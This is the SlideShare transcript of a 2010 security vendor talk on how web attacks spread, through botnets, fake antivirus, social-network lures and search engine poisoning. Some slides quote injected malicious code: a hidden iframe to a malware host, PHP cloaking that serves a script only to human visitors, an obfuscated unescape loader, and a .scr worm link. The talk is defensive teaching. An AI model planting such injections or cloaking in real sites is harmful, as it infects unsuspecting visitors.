2010-11 The Anatomy of a Web Attack
Upcoming SlideShare
Loading in...5
×
 

2010-11 The Anatomy of a Web Attack

on

  • 2,413 views

2010-11 The Anatomy of a Web Attack

2010-11 The Anatomy of a Web Attack
by Dennis Pike, Systems Engineer, Bluecoat Systems

Statistics

Views

Total Views
2,413
Views on SlideShare
2,403
Embed Views
10

Actions

Likes
0
Downloads
3
Comments
0

1 Embed 10

http://raleigh.issa.org 10

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

2010-11 The Anatomy of a Web Attack 2010-11 The Anatomy of a Web Attack Presentation Transcript

  • The Anatomy of a Web AttackDennis PikeSystems EngineerGeo Specialists Lead – Americas Securitydennis.pike@bluecoat.com Blue Coat Systems Confidential Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service names are the property of their respective owners. © Blue Coat Systems, Inc. 2010. All Rights Reserved.
  • Agenda  State of the Web • Top categories • Top attacks  The Anatomy of a Web Attack • Lures to web threats • Examples  Dynamic Link Analysis2 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • Best of the Worst  Top Web Category? >> Among the top ten active categories of 2009, social networking access accounted for 25 percent of all Web access activity  Top Web threat? >> Fake Antivirus was the most successful Web threat in 2009, followed by the Fake Video Codec offer. >>New Fake AV installer programs increased from an average of 300 to 1,462 per day in the second half of 2009. * >>Average lifetime of sites that redirect users to Web pages that try to install scareware decreased with a median lifetime dropping below 100 hours around April 2009, below 10 hours around September 2009, and below one hour since January 2010. * *Google Inc.3 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • Email vs Social Networking  Do more people use email or social networking sites? >> According to Nielsen Co., in August 2009, 277 million people used email across the U.S., several European countries, Brazil and Australia, a 21 percent increase from the year before. But the number of users on social networking and other community sites jumped 31 percent to 302 million, bypassing the email user population by 10 percent.4 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • Domain: Client% Domain: Client% Noteworthy Items ~Total~: youtube.com: 100% 35.7800 ~Total~: youtube.com: 100.00% 36.28 hotfile.com: 7.427 rapidshare.com: 6.36Argument for Video (HTTP and Streaming) apple.com: 4.901 hotfile.com: 5.26 ninjacloak.com: 4.205 apple.com: 3.98 rapidshare.com: 4.135 ninjacloak.com: 3.97 megaupload.com: 2.977 megaupload.com: 2.54 googlevideo.com: 2.66 googlevideo.com: 2.33 fbcdn.net: 1.791 fbcdn.net: 1.85 mediafire.com: 1.492 fileserve.com: 1.75 windowsupdate.com: 1.305 playstation.net: 1.74 playstation.net: 1.241 mediafire.com: 1.68 fileserve.com: 1.187 windowsupdate.com: 1.42 4shared.com: 1.031 zshare.net: 0.78 zshare.net: 0.7793 facebook.com: 0.65 dailymotion.com: 0.6476 dailymotion.com: 0.62 google.com: 0.588 4shared.com: 0.6 facebook.com: 0.5764 novamov.com: 0.54 novamov.com: 0.5737 google.com: 0.54 microsoft.com: 0.4747 farmville.com: 0.52 farmville.com: 0.4626 adobe.com: 0.41 video filesharing © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • Changing Web Habits Top 10 Categories – 2009 Social Networking WebFilter/WebPulse, 62M+ Users Moved to #1 from #2 position 1. Social Networking Represents 25% of Top10 requests 2. Web Advertisements 3. Search Engines/Portals Web Email 4. Personals/Dating Dropped to #9 from #5 position 5. Pornography Users migrating to social networking 6. Computers/Internet 7. Audio/Video Clips 8. Adult/Mature Content Cyber Crime Leverages 9. Web Email Search engine poisoning 10. Illegal/Questionable Fake AV and Codec updates Popular site injections Death, Drama & Disaster lures Health & Wealth scams6 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • Web Threats Rising Exponentially  2/3 of all known malicious code threats in 1 year (Symantec April’09)  1 in 150 Webpages infected in 2009 vs. 1 in 20,000 in 2006 (Kaspersky)7 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • Distribution Power  Botnet computing power to: Pitch worthless products Hijack online banking accounts Top 5 Steal corporate data Botnets in 2009 Botnet Zeus Koobface B Koobface D Monkif A Clickbot Peak 1,070,000 number 812,000 599,000 of active 506,000 bots 375,000 How it spreads Search Results Facebook Twitter Social Networking USA TODAY Research – March 20108 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • An Invitation to Crime 2 – Program messages user’s friends asking 3 – Anyone who clicks them to click on a link on the link is asked to to a photo or video. enable a media player needed to see the images. Running the file turns the PC into 1 – An automated a bot. program logs on to social network using stolen user 4 – The bot steals the PC credentials. owners logon credentials, starting the cycle again. USA TODAY Research – March 20109 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • Web Evolution Static Pages Dynamic Pages Dynamic Pages Interactive Pages Publishing Model Community Model Single Host Pages Multi-Host Pages Nice to Have Must Have10 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • Multi-Host Pages SPORT 6 Domains 13 Hosts 147 Requests 504 KB 14.5 Seconds11 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • Paths to Malware Infection Link Farms Infected Site Search Engine Blogs, Forums Relay Bait Malware12 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • End User…Infected Site www.inka.com <html> … <iframesrc="http://ho menameregistration. cn/in.cgi?income12" width=1 height=1 style="visibility: homenameregistration.cn/in.cgi?income12 hidden"></iframe><d iv id=“header”> … </html>13 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • Web 2.0 and Search Engines Forums Blogs Search Wikis WWW Engine View Guestbooks14 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • Web 2.0 and Search Engines Links… Links… Links… Links… Links… Links… Search WWW Engine Words… View Words… Words… Links… Links… Links…15 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 16 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 17 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • Hijacked Website if (“search engine”) { xdesignstudios.com echo “…indexable content…” } else { echo “<body><script src="live.js"></script>” dir1 } index.php … id=fall+printable+coloring+pages id=free+printable+easter+drawings id=disney+printable+cartoon+characters id=free+printable+halloween+sheets id=girls+free+printable+organizer id=in+store+printable+catherines+coupons … live.js18 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • End User…Search Engine Redirect index.php?id=hannah-montana-printable-birthday-invitations <body> <script src="live.js"> </script> document.write(unes live.js cape(%3C%53%43 %52%49%50%54% 20%20%20%20%6C %61%6E%67%75… http://cracksinside.com/red/gen.js19 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • What just happened? Links… Links… Links… Links… Links… Links… Search WWW Engine Words… View Words… Words… Links… Links… Links… Redirect20 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • Recent Examples - VBMania www.sharedocuments.com/library/PDF_Document21.025542010.pdf Email text www.sharedocument s.com/library/PDF_D ocument21.0255420 10.pdf members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr21 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • Recent Examples – Fake Warez22 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • © Blue Coat Systems, Inc. 2010. All Rights Reserved.